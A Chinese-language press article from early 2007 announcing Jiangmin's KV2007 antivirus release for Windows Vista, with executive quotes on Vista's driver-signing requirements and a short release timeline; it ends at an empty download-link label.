    微软在1月30日高调发布了VISTA操作系统家用版，并表示将主要通过与整机电脑厂商预装的形式推广，目前国内十多家品牌电脑厂商都已销售预装VISTA操作系统的电脑。VISTA操作系统有望在一年之内成为新增电脑的主流操作系统。然而VISTA家庭版的正式面世同时也带来安全隐患，目前市场上并无支持VISTA的正式版杀毒软件销售，网络上传播的也多数是测试版本，使用VISTA操作系统的电脑用户上网时将面临计算机病毒的威胁。

   早在去年12月份，江民科技即宣布国内首家研发成功支持VISTA的杀毒软件并进入公测阶段，正式产品将与微软VISTA家庭版同期发布。此次发布的新品即系公测结束后的正式版本。江民科技总裁常进喜介绍，目前正式版的江民杀毒软件KV2007VISTA版可以完全兼容WIN98以上所有操作系统，新品将在全国各地软件专售店面陆续上架，而KV2007老用户则可登陆江民网站下载安装包免费升级到新版本。

   江民KV2007VISTA新品在VISTA下的稳定流畅运行以及与安全中心的全面兼容，获得了试用者的一致好评。江民研发部总经理黄晓润介绍，由于VISTA采用了数字签名机制，给需要运行在操作系统内核的软件带来了一定的技术难度，为此国外杀毒软件厂商一度曾抱怨微软未提供足够的技术资料，使得他们的杀毒软件无法在安全中心运行，但黄晓润并不认为VISTA给杀毒厂商增加了技术门槛，他表示“与微软合作很愉快，研发进程也很顺利，二个月的时间完成了主要研发工作。”

   业内分析人士认为，江民此次全新推出与微软Vista全面兼容的杀毒软件，可以让用户在体验Vista带来的震撼与惊叹之时，免受病毒和黑客的骚扰，更好地提升Vista的安全性，真正地实现上网的安全无忧。

   
    江民研发VISTA杀毒软件时间表：

    2006年12月，微软正式发布VISTA企业版，同期江民科技宣布国内首家研发成功并进入公测阶段。

    2007年1月30日，微软正式发布VISTA家庭版，1月31日，江民科技宣布正式发布江民杀毒软件KV2007VISTA版。
    江民杀毒软件KV2007 VISTA正式版下载地址：